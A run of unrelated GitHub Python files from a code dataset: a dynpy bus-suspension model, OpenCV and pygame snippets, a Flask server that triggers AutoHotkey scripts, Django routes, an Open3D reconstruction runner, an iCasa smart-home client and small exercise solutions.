self.damper_2 = Damper(self.c_p, pos1=self.z_p , pos2 = self.z_pw , qs=[self.z, self.phi]) # right damper\n\n        #self.force = Force(-self.F_engine, pos1=self.z - self.l_p * self.phi, qs=[self.z, self.phi])\n        system = self.body +self.battery+ self.spring_1 + self.spring_2 + self.damper_1+ self.damper_2 + self.right_wheel + self.left_wheel + self.spring_pw + self.spring_lw+self.damper_lw+self.damper_pw\n        \n#         display(type(system))\n        \n#         system_new = system.subs({self.z_lw:self.z_l2,self.z_pw:self.z_p2}) \n        \n#         display(type(system_new))\n#         display(type(self.body))\n        \n        #super().__init__(system_new,**kwargs)\n\n        super().__init__(**{'system':system,**kwargs})\n        \n\n\n    \n    def symbols_description(self):\n        self.sym_desc_dict = {\n            self.m: r'Masa resorowana',\n            self.m_p: r'Masa przedniej osi',\n            self.m_l: r'Masa tylnej osi',\n            self.m_b: r'Masa baterii trakcyjnej',\n            self.I: r'Moment bezwładności',\n            self.l_rod: r'Długość osi',\n            self.l_p: r'Odległość od przedniej osi do środka ciężkości autobusu',\n            self.l_l: r'Odległość od tylnej osi do środka ciężkości autobusu',\n            self.l_b: r'Odległość od środka ciężkości baterii do środka ciężkości autobusu',\n            self.k_p: r'Współczynnik sztywności dla sprężyny przedniej nadwozia',\n            self.k_l: r'Współczynnik sztywności dla sprężyny tylnej nadwozia',\n            self.k_pw: r'Współczynnik sztywności dla przedniej opony',\n            self.k_lw: r'Współczynnik sztywności dla tylnej opony',\n            self.c_p: r'Współczynnik tłumienia dla amortyzatora przedniego',\n            self.c_l: r'Współczynnik tłumienia dla amortyzatora tylnego',\n            self.c_lw: r'Współczynnik tłumienia dla tylnej opony',\n            self.c_pw: r'Współczynnik tłumienia dla przedniej opony',\n            self.phi: r'Kąt obrotu masy resorowanej',\n            self.z: r'Przemieszczenie pionowe środka ciężkości masy resorowanej',\n            self.z_pw: r'Przemieszczenie pionowe przedniego koła',\n            self.z_lw: r'Przemieszczenie pionowe tylnego koła',\n            self.z_b: r'Przemieszczenie pionowe baterii',\n            self.A: r'Amplituda siły wymuszającej',\n            self.omega: r'Częstość siły wymuszającej',\n            self.ivar: r'Czas',\n            \n        }\n        return self.sym_desc_dict\n    \nsys2=DampedChairDDOF()\n\n\n\nunits_dict1 = {sys2.m:ureg.kilogram,\n              sys2.m_p:ureg.kilogram,\n              sys2.m_l:ureg.kilogram,\n              sys2.m_b:ureg.kilogram,\n              sys2.A:ureg.meter,\n              sys2.k_l:(ureg.newton / ureg.meter),\n              sys2.k_lw:(ureg.newton / ureg.meter),\n              sys2.k_p:(ureg.newton / ureg.meter),\n              sys2.k_pw:(ureg.newton / ureg.meter),\n              sys2.c_l:(ureg.newton*ureg.second / ureg.meter),\n              sys2.c_lw:(ureg.newton*ureg.second / ureg.meter),\n              sys2.c_p:(ureg.newton*ureg.second / ureg.meter),\n              sys2.c_pw:(ureg.newton*ureg.second / ureg.meter),\n              sys2.omega:ureg.radian/ureg.second,\n              sys2.l_l:ureg.meter,\n              sys2.l_p:ureg.meter,\n              sys2.l_b:ureg.meter,\n              sys2.l_rod:ureg.meter,\n              sys2.I:(ureg.kilogram*ureg.meter*ureg.meter),\n              sys2.phi:ureg.radian,\n              sys2.z:ureg.meter,\n              sys2.z.diff(t,t):ureg.meter/ureg.second**2,\n              sys2.z_lw:ureg.meter,\n              sys2.z_pw:ureg.meter,\n              sys2.z_b:ureg.meter,\n              t:ureg.second,\n              f:ureg.hertz,\n              }\n\nunit1=units_dict1\n    \nclass DampedChairSimplifiedDDOF2(ComposedSystem):\n\n    \n    \n    z,phi,z_pw,z_lw=dynamicsymbols('z, \\\\varphi z_pw z_lw')\n    m=Symbol('m', positive=True)\n    m_b=Symbol('m_b', positive=True)\n    m_p=Symbol('m_p', positive=True)\n    m_l=Symbol('m_l', positive=True)\n    I=Symbol('I', positive=True)\n    l_rod=Symbol('l_{rod}', positive=True)\n    l_l=Symbol('l_l', positive=True)\n    l_p=Symbol('l_p', positive=True)\n    l_b=Symbol('l_b', positive=True)\n    k_lw=Symbol('k_lw', positive=True)\n    k_pw=Symbol('k_pw', 
positive=True)\n    c_l=Symbol('c_l', positive=True)\n    c_p=Symbol('c_p', positive=True)\n    c_lw=Symbol('c_lw', positive=True)\n    c_pw=Symbol('c_pw', positive=True)\n    F_engine=Symbol('F_{engine}', positive=True)\n    k_p=Symbol('k_p', positive=True)\n    k_l=Symbol('k_l', positive=True)\n    A=Symbol('A', positive=True)\n    omega=Symbol('omega', positive=True)\n    z_l=Symbol('z_l', positive=True)\n    z_p=Symbol('z_p',positive=True)\n    z_b=Symbol('z_b',positive=True)\n    s=Symbol('s', positive=True)\n    k_l_zas=Symbol('k_l_zas', positive=True)\n    k_p_zas=Symbol('k_p_zas', positive=True)\n    c_l_zas=Symbol('c_l_zas', positive=True)\n    c_p_zas=Symbol('c_p_zas', positive=True)\n    ivar=Symbol('t')\n    \n    def __init__(self,\n                 m=None,\n                 m_p=None,\n                 m_l=None,\n                 m_b=None,\n                 I=None,\n                 l_rod=None,\n                 l_l=None,\n                 l_p=None,\n                 l_b=None,\n                 k_l=None,\n                 k_lw=None,\n                 k_p=None,\n                 k_pw=None,\n                 c_l=None,\n                 c_p=None,\n                 c_lw=None,\n                 c_pw=None,\n                 F_engine=None,\n                 ivar=Symbol('t'),\n                 z=None,\n                 phi=None,\n                 z_pw=None,\n                 z_lw=None,\n                 A=None,\n                 omega=None,\n                 z_l=None,\n                 z_p=None,\n                 z_b=None,\n                 s=None,\n                 k_l_zas=None,\n                 k_p_zas=None,\n                 c_l_zas=None,\n                 c_p_zas=None,\n                 \n                 **kwargs):\n        if z is not None: self.z=z\n        if z_lw is not None: self.z_lw=z_lw\n        if z_pw is not None: self.z_pw=z_pw\n        if z_l is not None: self.z_l=z_l\n        if z_p is not None: self.z_p=z_p\n        if z_b is not None: self.z_b=z_b\n        if phi is not None: self.phi=phi\n\n        if m is not None: self.m = m # mass of a rod\n        if m_p is not None: self.m_p = m_p # mass of the front axle\n        if m_l is not None: self.m_l = m_l # mass of the rear axle\n        if m_b is not None: self.m_b = m_b\n        if l_l is not None: self.l_l = l_l # offset of left spring\n        if l_p is not None: self.l_p = l_p #offset of right spring\n        if l_b is not None: self.l_b = l_b # offset of the battery\n        if l_rod is not None: self.l_rod = l_rod\n        if k_l is not None: self.k_l = k_l\n        if k_lw is not None: self.k_lw = k_lw\n        if k_p is not None: self.k_p = k_p\n        if k_pw is not None: self.k_pw = k_pw\n        if c_l is not None: self.c_l=c_l\n        if c_p is not None: self.c_p=c_p\n        if c_lw is not None: self.c_lw=c_lw\n        if c_pw is not None: self.c_pw=c_pw\n        if A is not None: self.A=A\n        if omega is not None: self.omega=omega\n        if I is not None: self.I = I # moment of inertia of a rod\n        if F_engine is not None: self.F_engine = F_engine\n        \n        \n        self.s=self.A*sin(ivar*self.omega)\n        \n        self.k_l_zas=(self.k_l*self.k_lw)/(self.k_l+self.k_lw)\n        self.k_p_zas=(self.k_p*self.k_pw)/(self.k_p+self.k_pw)\n        self.c_l_zas=(self.c_l*self.c_lw)/(self.c_l+self.c_lw)\n        self.c_p_zas=(self.c_p*self.c_pw)/(self.c_p+self.c_pw)\n        \n        self.z_l=self.z+self.phi*self.l_l\n        self.z_p=self.z-self.phi*self.l_p\n        self.z_lw=(self.k_l*self.z_l)/(self.k_lw+self.k_l)\n        self.z_pw=(self.k_p*self.z_p)/(self.k_pw+self.k_p)\n        \n        #self.right_wheel = MaterialPoint(self.m_w, pos1=self.z_pw, qs=[self.z, self.phi])\n        #self.left_wheel = MaterialPoint(self.m_w, pos1=self.z_lw, qs=[self.z, self.phi])\n        #self.spring_pw = Spring(self.k_pw, pos1=self.z_pw, pos2=self.s, qs=[self.z, self.phi])\n        #self.spring_lw = Spring(self.k_lw, pos1=self.z_lw, pos2=self.s, qs=[self.z, self.phi])\n        #self.spring=Spring(k,pos1,po2,qs)\n        \n        self.body = RigidBody2D(self.m, self.I, pos_lin=self.z, pos_rot=self.phi, qs=[self.z, self.phi]) # rod\n        self.battery= MaterialPoint(self.m_b, pos1=self.z+self.phi*self.l_b, qs=[self.z, self.phi])\n        self.spring_1 = Spring(self.k_l_zas, pos1=self.z_l , pos2 = self.s , qs=[self.z, self.phi]) # left spring\n        self.spring_2 = Spring(self.k_p_zas, pos1=self.z_p, pos2=self.s, qs=[self.z, self.phi])\n        self.damper_1=Damper(self.c_l_zas, pos1=self.z_l , pos2 = self.s, 
qs=[self.z, self.phi])\n        self.damper_2 = Damper(self.c_p_zas, pos1=self.z_p , pos2 = self.s , qs=[self.z, self.phi])\n\n        #self.force = Force(-self.F_engine, pos1=self.z - self.l_p * self.phi, qs=[self.z, self.phi])\n        system = self.body +self.battery+ self.spring_1 + self.spring_2 + self.damper_1+ self.damper_2 \n        \n#         display(type(system))\n        \n#         system_new = system.subs({self.z_lw:self.z_l2,self.z_pw:self.z_p2}) \n        \n#         display(type(system_new))\n#         display(type(self.body))\n        \n        #super().__init__(system_new,**kwargs)\n\n        super().__init__(**{'system':system,**kwargs}) \n\n    def symbols_description(self):\n        self.sym_desc_dict = {\n            self.m: r'Masa resorowana',\n            self.m_p: r'Masa przedniej osi',\n            self.m_l: r'Masa tylnej osi',\n            self.m_b: r'Masa baterii trakcyjnej',\n            self.I: r'Moment bezwładności',\n            self.l_rod: r'Długość osi',\n            self.l_p: r'Odległość od przedniej osi do środka ciężkości autobusu',\n            self.l_l: r'Odległość od tylnej osi do środka ciężkości autobusu',\n            self.l_b: r'Odległość od środka ciężkości baterii do środka ciężkości autobusu',\n            self.k_p: r'Współczynnik sztywności dla sprężyny przedniej nadwozia',\n            self.k_l: r'Współczynnik sztywności dla sprężyny tylnej nadwozia',\n            self.k_pw: r'Współczynnik sztywności dla przedniej opony',\n            self.k_lw: r'Współczynnik sztywności dla tylnej opony',\n            self.c_p: r'Współczynnik tłumienia dla amortyzatora przedniego',\n            self.c_l: r'Współczynnik tłumienia dla amortyzatora tylnego',\n            self.c_lw: r'Współczynnik tłumienia dla tylnej opony',\n            self.c_pw: r'Współczynnik tłumienia dla przedniej opony',\n            self.phi: r'Kąt obrotu masy resorowanej',\n            self.z: r'Przemieszczenie pionowe środka ciężkości masy resorowanej',\n            self.z_pw: r'Przemieszczenie pionowe przedniego koła',\n            self.z_lw: r'Przemieszczenie pionowe tylnego koła',\n            self.z_b: r'Przemieszczenie pionowe baterii',\n            self.A: r'Amplituda siły wymuszającej',\n            self.omega: r'Częstość siły wymuszającej',\n            self.ivar: r'Czas',\n            self.k_l_zas: r'Zastępcza wartość współczynnika sztywności zawieszenia tylnej osi',\n            self.k_p_zas: r'Zastępcza wartość współczynnika sztywności zawieszenia przedniej osi',\n            self.c_l_zas: r'Zastępcza wartość współczynnika tłumienia zawieszenia tylnej osi',\n            self.c_p_zas: r'Zastępcza wartość współczynnika tłumienia zawieszenia przedniej osi',\n        }\n        return self.sym_desc_dict\n    \nsys22=DampedChairSimplifiedDDOF2() \n    \nunits_dict2 = {sys22.m:ureg.kilogram,\n              sys22.m_p:ureg.kilogram,\n              sys22.m_l:ureg.kilogram,\n              sys22.m_b:ureg.kilogram,\n              sys22.A:ureg.meter,\n              sys22.k_l:(ureg.newton / ureg.meter),\n              sys22.k_lw:(ureg.newton / ureg.meter),\n              sys22.k_p:(ureg.newton / ureg.meter),\n              sys22.k_pw:(ureg.newton / ureg.meter),\n              sys22.c_l:(ureg.newton*ureg.second / ureg.meter),\n              sys22.c_lw:(ureg.newton*ureg.second / ureg.meter),\n              sys22.c_p:(ureg.newton*ureg.second / ureg.meter),\n              sys22.c_pw:(ureg.newton*ureg.second / ureg.meter),\n              sys22.omega:ureg.radian/ureg.second,\n              sys22.l_l:ureg.meter,\n              sys22.l_p:ureg.meter,\n              sys22.l_b:ureg.meter,\n              sys22.l_rod:ureg.meter,\n              sys22.I:(ureg.kilogram*ureg.meter*ureg.meter),\n              sys22.phi:ureg.radian,\n              sys22.z:ureg.meter,\n              sys22.z.diff(t,t):ureg.meter/ureg.second**2,\n              sys22.z_lw:ureg.meter,\n              sys22.z_pw:ureg.meter,\n              sys22.z_b:ureg.meter,\n              t:ureg.second,\n              f:ureg.hertz,\n              sys22.k_p_zas:(ureg.newton / ureg.meter),\n              sys22.k_l_zas:(ureg.newton / ureg.meter),\n              sys22.c_l_zas:(ureg.newton*ureg.second / ureg.meter),\n              sys22.c_p_zas:(ureg.newton*ureg.second / ureg.meter),\n              }\n\nunit2=units_dict2\n 
\n\n","repo_name":"bogumilchilinski/dynpy","sub_path":"models/mechanics/chair.py","file_name":"chair.py","file_ext":"py","file_size_in_byte":41680,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"41100007638","text":"import cv2\nimport numpy as np\n\nimg = np.zeros((512, 512, 3), np.uint8)\n# print(img.shape)\nimg[:] = 255, 25, 255 # whole img coloring ..partition-->200:300:300:200\n\n# 1 width & 2 height..Last params is thickness\ncv2.line(img, (0, 0), (img.shape[1], img.shape[0]), (0, 255, 0), 3)\ncv2.rectangle(img, (0, 0), (250, 350), (0, 0, 255), 2) # Rectangle\n# center point,circle radius,color scale,thickness\ncv2.circle(img, (200, 50), 30, (55, 55, 55), 2)\n# After \"OpenCV\"-> (width,height),font name,font size,color scale,thickness\ncv2.putText(img, \"OpenCV \", (300, 200),\n            cv2.FONT_HERSHEY_COMPLEX, 1, (255, 100, 125), 2)\ncv2.imshow(\"Image\", img)\n\n\ncv2.waitKey(0)\n","repo_name":"subhamrex/Coding_Practice","sub_path":"Python/OpenCv_Python/chapter4.py","file_name":"chapter4.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14466516789","text":"from flask import Flask\nimport subprocess\n\nstate = 'stop'\n\napp = Flask(__name__)\n\n\n@app.route('/<direction>')\ndef main(direction):\n    global state\n\n    if direction in ['forward', 'left', 'right', 'stop']:\n        print(f\"Processing {direction}\")\n        if state != direction:\n            subprocess.run([\"C:\\Program Files\\AutoHotkey\\AutoHotkey.exe\", f\"stop.ahk\"])\n            state = direction\n        subprocess.run([\"C:\\Program Files\\AutoHotkey\\AutoHotkey.exe\", f\"{direction}.ahk\"])\n\n    return '', 204\n\nif __name__ == '__main__':\n    app.run(host=\"0.0.0.0\", port=8098)","repo_name":"yurikaka/beam-server","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7092936266","text":"import pygame as pg\nimport random\nfrom config import *\n\nclass Platform(pg.sprite.Sprite):\n    def __init__(self, x, y):\n        super().__init__()\n        self.image = pg.image.load(\"PlatformSprite.png\")\n        self.surf = pg.Surface((85, 10))\n        self.surf.fill(BLACK)\n        self.rect = self.surf.get_rect(topleft=(x, y))\n        self.rect.x = x\n        self.rect.y = y\n        self.vel = 0","repo_name":"wesdeal/Cathacks2023","sub_path":"Platform.py","file_name":"Platform.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23452859819","text":"from collections import Counter\nimport time\n\n\ndef solution1(participant, completion):\n    s = time.time()\n    part = Counter(participant)\n    comp = Counter(completion)\n    ans = part - comp\n    # print(list(ans.keys())[0])\n    print(f'{time.time() - s:.30f}')\n    return list(ans.keys())[0]\n\n\ndef solution2(participant, completion):\n    s = time.time()\n    d = {}\n    for x in participant:\n        d[x] = d.get(x, 0) + 1\n    for x in completion:\n        d[x] -= 1\n    dnf = [k for k, v in d.items() if v > 0]\n    print(f'{time.time() - s:.30f}')\n    return dnf[0]\n\n\nsolution1([\"mislav\", \"stanko\", \"mislav\", \"ana\"], [\"stanko\", \"ana\", \"mislav\"])\nsolution2([\"mislav\", \"stanko\", \"mislav\", \"ana\"], [\"stanko\", \"ana\", 
\"mislav\"])\n","repo_name":"yeoV/Algorithm","sub_path":"Programmers/LV_1/lv_1_완주하지못한선수.py","file_name":"lv_1_완주하지못한선수.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7019415881","text":"from django.conf.urls import url,include\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^index$', views.index, name='index'),\n url(r'^search$', views.search, name='search'),\n url(r'^addlocation$', views.addlocation, name='addlocation'),\n url(r'^addroom$', views.addroom, name='addroom'),\n url(r'^information', views.information, name='information'),\n url(r'^users$', views.users, name='users'),\n url(r'^vote$', views.vote, name='vote'),\n url(r'^autentication$',views.login, name='autentication'),\n url(r'^logout$',views.logout_view,name='logout'),\n url(r'^', include('django.contrib.auth.urls')),\n url(r'^register$', views.register_user, name='registration'),\n url(r'^register_success$', views.register_success, name='registration_success')\n]\n","repo_name":"Mez1092/TravelBook","sub_path":"myTravel/TravelBook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14358682586","text":"\"\"\"\nrun with:\npython -mtimeit -s'import examples.speed_tests as st' 'st.use_rs()'\npython -mtimeit -s'import examples.speed_tests as st' 'st.use_py()'\n\"\"\"\nimport numpy as np\n\nimport ndarray_threaded_window as ntw\n\nnp.random.seed(19680801)\nwindow_len = 50\narray = array = np.random.randint(0, 255, (10000000, window_len), np.uint8)\n\n\ndef use_rs():\n ntw.apply_window(array, ntw.func_fast_population_std, [1, window_len])\n\n\ndef use_py():\n np.std(array, axis=1, dtype=np.float64)\n\n\nif __name__ == '__main__':\n print(\"this should not be run directly\")\n","repo_name":"Quiet-Clicking-Sounds/ndarray_threaded_window","sub_path":"examples/speed_tests.py","file_name":"speed_tests.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20454031682","text":"# Open3D: www.open3d.org\r\n# The MIT License (MIT)\r\n# See license file or visit www.open3d.org for details\r\n\r\n# importing required libraries\r\nimport json\r\nimport time, datetime\r\nimport sys\r\nsys.path.append(\"../Utility\")\r\nfrom file import check_folder_structure\r\nsys.path.append(\".\")\r\nfrom initialize_config import initialize_config\r\nimport os\r\n\r\n# for scene 1\r\nanalysis_folders = [\"..\\\\analysis_folder_scene_1\"]\r\n# for scene 2\r\n# analysis_folders = [\"analysis_folder_scene_2\"]\r\n\r\n\r\nis_make=input(\"Make fragments (y/n)? \")\r\nis_register=input(\"Register fragments (y/n)? \")\r\nis_refine=input(\"Refine fragments (y/n)? \")\r\nis_integrate=input(\"Integrate final scene (y/n)? 
\")\r\nconfig_folders=[folder+\"\\\\config\" for folder in analysis_folders]\r\nconfig_file_path_list=[]\r\nfor folder in config_folders:\r\n config_file_path_list.extend([folder+\"\\\\\"+file for file in os.listdir(folder)])\r\n\r\nfor config_file in config_file_path_list:\r\n with open(config_file) as json_file:\r\n config = json.load(json_file)\r\n initialize_config(config)\r\n check_folder_structure(config[\"path_dataset\"])\r\n assert config is not None\r\n\r\n config['debug_mode'] = False\r\n\r\n print(\"====================================\")\r\n print(\"Configuration\")\r\n print(\"====================================\")\r\n for key, val in config.items():\r\n print(\"%40s : %s\" % (key, str(val)))\r\n\r\n times = [0, 0, 0, 0]\r\n if is_make==\"y\":\r\n start_time = time.time()\r\n import make_fragments\r\n make_fragments.run(config)\r\n times[0] = time.time() - start_time\r\n if is_register==\"y\":\r\n start_time = time.time()\r\n import register_fragments\r\n register_fragments.run(config)\r\n times[1] = time.time() - start_time\r\n if is_refine==\"y\":\r\n start_time = time.time()\r\n import refine_registration\r\n refine_registration.run(config)\r\n times[2] = time.time() - start_time\r\n if is_integrate==\"y\":\r\n start_time = time.time()\r\n import integrate_scene\r\n integrate_scene.run(config)\r\n times[3] = time.time() - start_time\r\n\r\n print(\"====================================\")\r\n print(\"Elapsed time (in h:m:s)\")\r\n print(\"====================================\")\r\n print(\"- Making fragments %s\" % datetime.timedelta(seconds=times[0]))\r\n print(\"- Register fragments %s\" % datetime.timedelta(seconds=times[1]))\r\n print(\"- Refine registration %s\" % datetime.timedelta(seconds=times[2]))\r\n print(\"- Integrate frames %s\" % datetime.timedelta(seconds=times[3]))\r\n print(\"- Total %s\" % datetime.timedelta(seconds=sum(times)))\r\n sys.stdout.flush()","repo_name":"DanieleMarchisotti/virtual_benchmark_SLAM_3D","sub_path":"create_new_dataset/python/recon_3d_run.py","file_name":"recon_3d_run.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69997243288","text":"from utils.config import read_kind, read_devices, read_devices_short, HOST, PORT, resp_time\nfrom utils.conversion import conversion\nfrom requests import get, put\nfrom time import sleep\nimport pandas as pd\nimport socket\nimport json\n\n\nclass icasa:\n def __init__(self):\n self.host = HOST\n self.port = PORT\n\n self.root = f'http://localhost:9000'\n\n self.get_devices_url = f'{self.root}/icasa/devices/devices'\n self.get_zones_url = f'{self.root}/icasa/zones/zones'\n self.get_persons_url = f'{self.root}/icasa/persons/persons'\n\n self.put_device_url = f'{self.root}/icasa/devices/device'\n self.put_zone_url = f'{self.root}/icasa/zones/zone'\n self.put_person_url = f'{self.root}/icasa/persons/person'\n\n self.speed_url = f'{self.root}/icasa/clocks/clock/default'\n self.restart_url = f'{self.root}/icasaRestart'\n\n self.read_kind =read_kind\n self.read_devices = read_devices\n self.read_devices_short = read_devices_short\n\n columns = [f'{k}' for k, v in self.read_devices_short.items()]\n columns.append('Pow')\n self.data = pd.DataFrame(columns={node: [] for node in columns}).astype(int)\n\n # Store sample in dataset\n def store(self):\n self.data.to_csv('dataset_online_sampling.csv', index=False, index_label=False, mode='a', header=False)\n\n # GET a new sample\n def sample(self):\n new_data = 
{}\n\n        # Read sensor data\n        resp_device = get(self.get_devices_url)\n        if resp_device.status_code != 200:\n            print(\"data loading failed!\")\n\n        for device in resp_device.json():\n            id = device['id']\n            if id not in self.read_devices:\n                print('Device not known!')\n                continue\n            for param in device['properties']:\n                if param['name'] == self.read_devices[id]:\n                    new_data[[k for k, v in self.read_devices_short.items() if v == id][0]] = [param['value']]\n\n        n_data = pd.DataFrame(new_data)\n\n        # Manually adding Pow value since it is not a device\n        # light = 100 if n_data['L'].bool() else 0\n        # n_data['Pow'] = light + n_data['H'] * 1000 + n_data['C'] * 1000\n\n        return n_data\n\n    # The function updates the device values with a PUT request (works only if PUTs succeed)\n    def intervention_by_API(self, evidence):\n        for kind, (name, property), value in evidence:\n            if kind == 'device':\n                resp = put(self.put_device_url + f'/{name}' + f'/{property}',\n                           data=json.dumps(value))\n            elif kind == 'zone':\n                resp = put(self.put_zone_url + f'/{name}',\n                           data=json.dumps({property: value}))\n            elif kind == 'person':\n                resp = put(self.put_device_url + f'/{name}',\n                           data=json.dumps({'id': name, property: value}))\n            else:\n                assert False, 'unrecognized option: kind'\n\n            if resp.status_code != 200:\n                print(\"pushing data failed!\", \"Error code: \", resp.status_code)\n\n        print('Intervention [OK]')\n\n    def format_evidence(self, evidence):\n        return [(self.read_kind[name], (self.read_devices_short[name],\n                                        self.read_devices[self.read_devices_short[name]]),\n                 value) for name, value in evidence.items()]\n\n    def intervention_by_socket(self, evidence):\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        try:\n            sock.connect((self.host, self.port))\n        except:\n            print(\"Connection to server refused!\")\n            return\n\n        # ev_str = str(evidence_to_numeric(evidence)) + \"\\n\"\n        ev_str = str(evidence) + \"\\n\"\n        ev_byte = str.encode(ev_str)\n        sock.sendall(ev_byte)\n\n        print('Intervention ok')\n\n    def do(self, evidence, do_size=2, resp_time=resp_time):\n\n        columns = [f'{k}' for k, v in self.read_devices_short.items()]\n        # Append Pow column\n        columns.append('Pow')\n\n        # Initialize dataset\n        df = pd.DataFrame(columns={node: [] for node in columns}).astype(int)\n\n        if evidence is not None:\n            # Format evidence: necessary only with intervention via API\n            formatted = self.format_evidence(evidence)\n\n            # Make intervention via socket or API (pay attention to the evidence format)\n            # self.intervention_by_socket(evidence)\n            self.intervention_by_API(formatted)\n\n        # Collect do_size samples\n        for i in range(do_size):\n            new_sample = self.sample()\n\n            # Pow\n            if evidence is not None:\n                node = str(tuple(evidence.items())[0][0])\n                if node == 'L':\n                    new_sample['Pow'] = 100 if new_sample['L'].bool() else 0\n                elif node == 'H':\n                    # Justifiable because below a certain threshold the sensor cannot measure the power\n                    new_sample['Pow'] = new_sample['H'] * 1000 if new_sample['H'].item() > 500 else 0\n                elif node == 'C':\n                    new_sample['Pow'] = new_sample['C'] * 1000 if new_sample['C'].item() > 500 else 0\n                else:\n                    new_sample['Pow'] = 0\n            else:\n                light = 100 if new_sample['L'].bool() else 0\n                heater = new_sample['H'] * 1000 if new_sample['H'].item() > 500 else 0\n                cooler = new_sample['C'] * 1000 if new_sample['C'].item() > 500 else 0\n                new_sample['Pow'] = light + heater + cooler\n\n            df = pd.concat([df, conversion(new_sample)], axis=0)\n            sleep(resp_time) if resp_time > 0 else None\n\n        df.reset_index(drop=True, inplace=True)\n\n        # Store 
data\n self.data = df\n self.store()\n\n return df\n\n # The function simulates the values without making a real intervention\n # def simulate(self, evidence, do_size=2):\n #\n # evidence = evidence_to_numeric(evidence)\n #\n # node = str(tuple(evidence.items())[0][0])\n # value = tuple(evidence.items())[0][1]\n #\n # df = pd.DataFrame(columns=['Pr', 'L', 'T', 'W', 'H', 'Pow']).astype(int)\n #\n # sample = {}\n # for i in range(do_size):\n #\n # # Simulate past values\n # if i == 0:\n # for n in df.columns:\n # if n == 'Pr':\n # sample['Pr'] = 0\n # elif n == 'L':\n # sample['L'] = 0\n # elif n == 'Pow':\n # sample['Pow'] = 500\n # elif n == 'H':\n # sample['H'] = 600\n # elif n == 'W':\n # sample['W'] = 0\n # elif n == 'T':\n # sample['T'] = 293.15\n #\n # # Intervention\n # sample[node] = value\n #\n # # Change values based on intervention\n # if node == 'L':\n # sample['Pow'] = sample['Pow'] * 2 if sample['L'] == 1 else sample['Pow'] // 2\n # elif node == 'H':\n # sample['Pow'] = sample['Pow'] * 2 if sample['H'] > 500 else sample['Pow'] // 2\n # sample['T'] = sample['T'] * 2 if sample['H'] > 500 else sample['T'] // 2\n # elif node == 'W':\n # sample['T'] = sample['T'] * 2 if sample['W'] == 0 else sample['T'] // 2\n #\n # # Add sample to dataset\n # df = df.append(pd.Series(sample, name=i))\n #\n # return conversion(df)\n\n\nif __name__ == '__main__':\n home = icasa()\n\n # TEST sample, status: working\n # ret = home.sample()\n # print(ret)\n\n # TEST intervention, status: working\n # evidence = ['BinaryLight-5022136575', 'binaryLight.powerStatus', 'true']\n # ret = home.intervention(evidence)\n # print(ret)\n\n # TEST do, status: working\n # evidence = {'O': 300.0}\n # ret = home.do(evidence)\n # print(ret)\n\n # TEST simulate, status: working\n # evidence = {'H': 1}\n # df = home.simulate(evidence, 10)\n # print(df)\n\n # In order to make sampling without intervention, we can call do method with a None evidence\n\n # TEST intervention\n # evidence = {'L': 0}\n #\n # home.do(evidence=None, do_size=2, resp_time=0)\n # home.intervention(evidence)\n # print(home.sample())\n # print(home.data)\n\n\n","repo_name":"pakyr/multiagent_algorithm","sub_path":"online.py","file_name":"online.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26536285772","text":"\r\nfrom pylab import *\r\nimport csv\r\n\r\ndef readData(filename):\r\n\t\"\"\"Read in samples of a training represented one per line,\"\"\" \r\n\tprint(\"Loading Data: \" + filename) \r\n\tsamples = []\r\n\r\n\twith open(filename,'r') as testfile:\r\n\t\tcsv_reader = csv.reader(testfile)\r\n\t\tskip = True\r\n\t\tfor line in csv_reader:\r\n\t\t\tif(skip):\r\n\t\t\t\tskip = False\r\n\t\t\t\tcontinue\r\n\t\t\tsamples.append([float(line[0]),float(line[1]),float(line[2])])\r\n\r\n\tprint(\" completed.\\n\")\r\n\treturn samples\r\n\r\n\r\ndef plotSamples( samples,title):\t\r\n\t'''\r\n\treceives statices and creates a plot\r\n\t'''\r\n\tx = [i for i in range(0,len(samples))]\r\n\tyTarget = [s[1] for s in samples]\r\n\tyOutput = [s[2] for s in samples]\r\n\tline, = plt.plot(x, yTarget, lw=1, label=\"Target\")\r\n\tline, = plt.plot(x, yOutput, lw=1, label=\"Output\")\r\n\tplt.legend()\r\n\tplt.title(\" {}\".format(title) )\r\n\t# plt.savefig(\"{} \".format(title))\r\n\tplt.show()\r\n\treturn plt\r\n\r\ndef main():\r\n\tfor i in range(1,11):\r\n\t\tsamples = 
